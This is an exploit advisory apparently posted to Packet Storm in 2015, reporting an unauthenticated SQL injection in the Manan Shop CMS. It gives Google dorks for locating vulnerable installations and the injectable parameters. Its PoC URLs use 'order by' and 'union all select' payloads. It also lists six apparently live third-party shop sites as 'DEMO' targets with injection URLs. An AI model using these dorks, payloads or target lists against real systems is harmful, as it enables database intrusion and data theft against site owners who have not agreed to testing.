Lucene search

K
packetstormShelesh RauthanPACKETSTORM:132574
HistoryJul 04, 2015 - 12:00 a.m.

Manan Shop SQL Injection

2015-07-0400:00:00
Shelesh Rauthan
packetstormsecurity.com
31
`=========================================================  
[+] Title :- Manan Shop CMS - SQL Injection Vulnerability   
[+] Date :- 4 - July - 2015  
[+] Vendor Homepage :- http://www.manan.asia/  
[+] Version :- All Versions  
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows  
[+] Category :- webapps  
[+] Google Dorks :- "Designed & Developed by Manan"  
"Designed & Developed by Manan" "php?cat="  
"Designed & Developed by Manan" +inurl:/.php?itemid=   
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)  
[+] Team name :- Team Alastor Breeze, Intelligent-Exploit  
[+] Official Website :- serverfarming.com, intelligentexploit.com  
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k  
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha, DK  
[+] Contact :- fb.com/shelesh.rauthan, [email protected], [email protected]  
  
  
=========================================================  
[+] Severity Level :- High  
  
[+] Request Method(s) :- GET / POST  
  
[+] Vulnerable Parameter(s) :- itemid, numberofitems, catname, cat  
  
[+] Affected Area(s) :- Entire admin, database, Server  
  
[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error  
  
[+] SQL vulnerable File :- /home1/outboxi1/public_html/DOMAIN.com/products_view.php  
  
[+] POC :- http://127.0.0.1/index.php?id=[SQL]'  
  
The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.  
  
PoC:  
http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' order by [SQL INJECTION]--+  
http://www.[WEBSITE].com/index.php?cat=1&catname=Women&subcat=all&numberofitems=-9' union all select [SQL INJECTION]--+  
  
  
[+] DEMO :- http://www.etalage-id.com/index.php?cat=1&catname=Women&subcat=all&numberofitems=9%27  
http://www.chloeprincess.com/index.php?cat=1&catname=Latest%20Collection&subcat=4&subcatname=ALL&itemid=2014%27  
http://www.coralicekids.com/index.php?cat=100&catname=NewArrival&subcat=&subcatname=&itemid=2267%27   
http://www.kamiidea.com/index.php?cat=7&catname=Accessories&subcat=32&subcatname=Shoes%27  
http://www.loewyshop.com/index.php?cat=101&catname=Sale&subcat=all&subcatname=&itemid=46%27  
http://www.outboxidea.com/ribbonshopstore.com/index.php?cat=100&catname=Bags&subcat=&subcatname=&itemid=464%27  
  
=======================================================  
`